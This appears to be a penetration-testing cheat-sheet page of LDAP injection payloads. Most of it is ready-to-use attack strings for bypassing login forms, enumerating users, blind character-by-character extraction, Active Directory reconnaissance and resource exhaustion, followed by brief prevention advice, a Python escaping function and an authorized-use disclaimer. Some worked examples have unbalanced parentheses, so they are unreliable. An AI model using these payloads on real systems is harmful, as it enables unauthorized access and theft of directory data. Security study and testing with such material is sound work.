Skip to content

LDAP Injection Payloads

LDAP Injection is an attack technique that exploits web applications that construct LDAP statements based on user input. Attackers can inject malicious LDAP queries to bypass authentication, access unauthorized data, or modify LDAP tree content.

Basic Concepts

LDAP (Lightweight Directory Access Protocol) uses a specific query syntax with filters enclosed in parentheses.

LDAP Filter Syntax

(attribute=value)
(&(condition1)(condition2))  # AND
(|(condition1)(condition2))  # OR
(!(condition))               # NOT

Important LDAP Attributes

  • cn - Common Name
  • uid - User ID
  • mail - Email addressl
  • sn - Surname
  • objectClass - Object type
  • userPassword - Password

Authentication Bypass

Basic Bypass Payloads

*
*)(uid=*)
*)(uid=*)(|(uid=*
*)(|(uid=*
admin)
admin)(|(password=*)
*)(uid=admin)

Login Form Bypass

Original Query: 

(&(uid=user)(password=pass))

Injected Username: *)(uid=*
Injected Password: *

Resulting Query: 

(&(uid=*)(uid=*)(password=*))

Bypass Examples

# Username: admin)(&)
# Password: anything
(&(uid=admin)(&)(password=anything))

# Username: *)(|(objectClass=*)
# Password: whatever
(&(uid=*)(|(objectClass=*))(password=whatever))

# Username: admin)(|(password=*))
# Password: empty
(&(uid=admin)(|(password=*)))(password=))

Information Disclosure

Username Enumeration

(uid=*)
(cn=*)
(mail=*)
(sn=*)
(|(cn=*)(uid=*))
(|(cn=*)(mail=*))

Extract All Users

(objectClass=*)
(objectClass=person)
(objectClass=inetOrgPerson)
(objectClass=user)
(objectClass=organizationalPerson)

Extract All Attributes

(cn=*)(mail=*)
(|(uid=*)(mail=*)(sn=*))

Wildcard Searches

(uid=a*)
(cn=ad*)
(mail=*@example.com)
(uid=adm?n)

Advanced Information Gathering

# Get all admin users
(|(cn=admin*)(uid=admin*))

# Get users with specific email domain
(mail=*@admin.com)

# Get all groups
(objectClass=group)

# Get all organizational units
(objectClass=organizationalUnit)

Blind LDAP Injection

Boolean-Based Blind Injection

# True condition
(uid=admin)(cn=*)

# False condition
(uid=admin)(cn=nonexistent)

Character-by-Character Extraction

(uid=admin)(cn=a*)  # Test if cn starts with 'a'
(uid=admin)(cn=ad*) # Test if cn starts with 'ad'
(uid=admin)(cn=adm*) # Continue...

Testing LDAP Attributes Existence

(uid=admin)(mail=*)
(uid=admin)(telephoneNumber=*)
(uid=admin)(description=*)

Special Characters

Characters that need to be escaped in LDAP queries:

  • * - Wildcard (matches any characters)
  • ( - Open parenthesis
  • ) - Close parenthesis
  • \ - Backslash
  • NUL - Null character

Escaped Characters

\2a - *
\28 - (
\29 - )
\5c - \
\00 - NUL

Advanced Techniques

AND/OR Logic Manipulation

# Original: (&(uid=user)(password=pass))

# Inject to always true
*)(|(objectClass=*)

# Results in: (&(uid=*)(|(objectClass=*))(password=pass))

Nested Filters

(|(&(uid=*)(objectClass=*))(password=*))

Denial of Service

# Complex queries that consume resources
(|(sn=*)(givenName=*))*
(|(cn=*)(uid=*)(mail=*)(sn=*)(givenName=*))

Platform-Specific Payloads

Active Directory

# Find all domain admins
(memberOf=CN=Domain Admins,CN=Users,DC=example,DC=com)

# Find users with adminCount=1
(adminCount=1)

# Find computer accounts
(objectClass=computer)

# Find service accounts
(servicePrincipalName=*)

OpenLDAP

# Find all posixAccount objects
(objectClass=posixAccount)

# Find by UID number
(uidNumber=1000)

# Find by GID
(gidNumber=100)

Detection and Testing

Error Messages

Common LDAP error messages that indicate injection:

  • "Invalid DN syntax"
  • "Bad search filter"
  • "LDAP connection error"
  • "Unbalanced parentheses"

Testing Steps

  1. Test wildcards: Try * in username/password fields
  2. Test parentheses: Try )( to break the query
  3. Test boolean operators: Try | and &
  4. Observe responses: Different responses indicate injection
  5. Extract data: Use blind techniques if direct output is unavailable

Example Attack Scenarios

Scenario 1: Login Bypass

Application Code: 

$filter = "(&(uid=$username)(password=$password))";

Attack: - Username: admin)(&) - Password: (anything)

Result: Query becomes (&(uid=admin)(&)(password=anything)) which matches admin user.

Scenario 2: Data Extraction

Attack: - Username: *)(uid=*))(|(uid=* - Password: *

Result: Returns all users in the directory.

Scenario 3: Privilege Escalation

Attack: - Username: *)(|(objectClass=*)) - Password: (empty)

Result: May return privileged accounts.

Prevention Best Practices

  1. Input Validation: Validate and sanitize all user input
  2. Whitelist Allowed Characters: Only allow alphanumeric characters
  3. Escape Special Characters: Properly escape LDAP special characters
  4. Parameterized Queries: Use LDAP libraries with parameterization
  5. Principle of Least Privilege: Limit LDAP account permissions
  6. Error Handling: Don't reveal LDAP details in error messages
  7. Account Lockout: Implement account lockout mechanisms

Escaping Function Example (Python)

def escape_ldap(input_string):
    replacements = {
        '\\': '\\5c',
        '*': '\\2a',
        '(': '\\28',
        ')': '\\29',
        '\x00': '\\00'
    }
    for char, replacement in replacements.items():
        input_string = input_string.replace(char, replacement)
    return input_string

Testing Tools

  • LDAPNomNom - LDAP enumeration tool
  • ldapsearch - Command-line LDAP client
  • ldapdomaindump - Active Directory information dumper
  • Burp Suite - Web application security testing
  • OWASP ZAP - Security scanner

⚠️ Warning: These payloads are for educational and authorized security testing purposes only. Unauthorized use is illegal.